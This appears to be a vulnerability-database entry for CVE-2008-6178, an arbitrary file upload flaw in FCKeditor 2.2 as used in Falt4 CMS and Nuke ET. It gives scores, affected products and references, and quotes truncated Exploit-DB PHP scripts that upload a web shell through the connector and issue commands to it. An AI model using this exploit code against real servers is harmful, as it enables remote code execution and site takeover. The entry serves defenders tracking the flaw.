CVE-2008-6178
published 2009-02-19CVE-2008-6178: Unrestricted file upload vulnerability in editor/filemanager/browser/default/connectors/php/connector.php in FCKeditor 2.2, as used in Falt4 CMS, Nuke ET, and…
PriorityP350high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
7.81%
93.9th percentile
Unrestricted file upload vulnerability in editor/filemanager/browser/default/connectors/php/connector.php in FCKeditor 2.2, as used in Falt4 CMS, Nuke ET, and other products, allows remote attackers to execute arbitrary code by creating a file with PHP sequences preceded by a ZIP header, uploading this file via a FileUpload action with the application/zip content type, and then accessing this file via a direct request to the file in UserFiles/File/, probably a related issue to CVE-2005-4094. NOTE: some of these details are obtained from third party information.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fckeditor | fckeditor | — | — |
| fckeditor | fckeditor | — | — |
| fckeditor | fckeditor | — | — |
| fckeditor | fckeditor | — | — |
| fckeditor | fckeditor | — | — |
| phplist | phplist | — | — |
| phplist | phplist | — | — |
| phplist | phplist | — | — |
| phplist | phplist | — | — |
| phplist | phplist | — | — |
| phplist | phplist | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload
exploitdb·2009-02-16
CVE-2008-6178 Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload
Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload
---
################################################################
#
# Falt4 CMS (fckeditor) Arbitrary File Upload Exploit
#
# Bug Discovered By : Sp3shial
#
# [email protected]
#
# Persian Boys Hacking Team From A Land With A History-Long Background
#
# Download CMS : http://downloads.sourceforge.net/falt4/falt4extreme.zip?modtime=1196845455&big_mirror=0
#
###############################################################
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
define(STDIN, fopen("php://stdin", "r"));
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
w
Exploit-DB
Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload
exploitdb·2008-10-18
CVE-2008-6178 Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload
Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload
---
\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root
$packet = "GET {$path}{$filename} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connectio
No writeups or analysis indexed.
http://secunia.com/advisories/33973http://www.securityfocus.com/bid/31812http://www.vupen.com/english/advisories/2009/0447https://exchange.xforce.ibmcloud.com/vulnerabilities/48769https://www.exploit-db.com/exploits/8060http://secunia.com/advisories/33973http://www.securityfocus.com/bid/31812http://www.vupen.com/english/advisories/2009/0447https://exchange.xforce.ibmcloud.com/vulnerabilities/48769https://www.exploit-db.com/exploits/8060
2009-02-19
Published